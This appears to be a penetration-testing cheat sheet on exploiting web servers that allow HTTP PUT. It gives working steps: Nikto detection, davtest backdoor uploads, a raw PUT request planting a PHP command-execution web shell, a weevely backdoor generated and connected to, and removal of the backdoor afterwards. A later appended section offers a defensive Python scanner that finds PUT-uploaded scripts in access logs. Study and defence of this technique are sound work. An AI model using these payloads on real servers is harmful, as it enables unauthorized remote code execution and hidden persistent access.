Abusing HTTP PUT

Detection of vulnerability

Run Nikto:

nikto --host <target ip>:<target port>

If it returns

+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.

You are potentially in business.

Some options for exploitation:

Try to get a backdoor with davtest

davtest -url http://<target ip>:<target port> -sendbd auto -cleanup

This will test all the payloads it has, send backdoors, and clean up after itself.

Try a basic PHP backdoor with Burp

Capture a request and send it to Repeater. Change the method to PUT and add some PHP code to the bottom of the request. It should look roughly like this:

PUT /test.php HTTP/1.1
Host: <target ip>:<target port>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 17 Feb 2017 22:27:30 GMT
If-None-Match: "18518f6-5a9-548c16b5e72ae"
Cache-Control: max-age=0
Content-Length: 50

<?php
echo exec($_GET[cmd]);
?>

Once this is up, navigate to the page and try to run commands like so:

http://<target ip>:<target port>/test.php?cmd=whoami

Create a backdoor with weevely and upload it with poster

Start by downloading the Poster add-on for Firefox.

Next, spawn a backdoor with weevely:

weevely generate evil /root/back.php

This will output back.php with the password evil.

Go ahead and upload this shell using the PUT method with Poster by setting the following fields:

URL: http://<target ip>:<target port>/back.php
File: <location of back.php>

and then clicking the PUT button.

Now access the backdoor like so:

weevely http://<target ip>:<target port>/back.php evil

Cleanup

Once you're done, delete the backdoor using the DELETE method with Poster (specify DELETE in the dropdown and click the green button). Alternatively, since you'll probably have gotten a shell to the system at this point, you can rm it as well.
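
For the defensive side of the sequence above (PUT upload, command requests, DELETE cleanup), the following added example, which is not part of the original notes, scans web server access logs for script files created via PUT and any later requests to them. The log lines are constructed samples in combined log format, and the extension list is an assumption to tune per server.

```python
import re

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Feb/2017:22:30:01 +0000] "PUT /test.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Feb/2017:22:30:09 +0000] "GET /test.php?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Feb/2017:22:31:00 +0000] "PUT /notes.txt HTTP/1.1" 405 312 "-" "curl/7.50"
10.0.0.8 - - [17/Feb/2017:22:32:00 +0000] "GET /index.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Feb/2017:22:40:00 +0000] "DELETE /test.php HTTP/1.1" 204 0 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumed list of server-side script extensions; adjust to what the server executes.
SCRIPT_EXT = (".php", ".asp", ".aspx", ".jsp", ".cgi", ".pl")


def find_put_uploads(log_text):
    """Return one finding per script file created via a successful PUT,
    including later successful GET/POST requests to it and whether it was DELETEd."""
    uploads = {}  # path -> finding
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        ok = status.startswith("2")
        if method == "PUT" and ok and path.lower().endswith(SCRIPT_EXT):
            uploads[path] = {"path": path, "uploader": ip, "time": ts,
                             "executed": [], "deleted": False}
        elif path in uploads and ok:
            if method in ("GET", "POST"):
                uploads[path]["executed"].append(target)
            elif method == "DELETE":
                # A deleted upload is still an incident: the file ran before cleanup.
                uploads[path]["deleted"] = True
    return list(uploads.values())


if __name__ == "__main__":
    for finding in find_put_uploads(SAMPLE_LOG):
        print(finding)
```

A finding with "deleted" set means the file is no longer on disk, so the access log may be the only remaining record of the upload.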

Resources

https://www.youtube.com/watch?v=vjatR1BKHO8
https://www.youtube.com/watch?v=Pb6Nd7Cl5XM&t=82s
https://www.youtube.com/watch?v=mgXWZVJ47qU
https://www.sans.org/reading-room/whitepapers/testing/penetration-testing-web-application-dangerous-http-methods-33945
http://www.smeegesec.com/2014/10/detecting-and-exploiting-http-put-method.html
http://niiconsulting.com/checkmate/2014/04/owning-enterprise-http-put/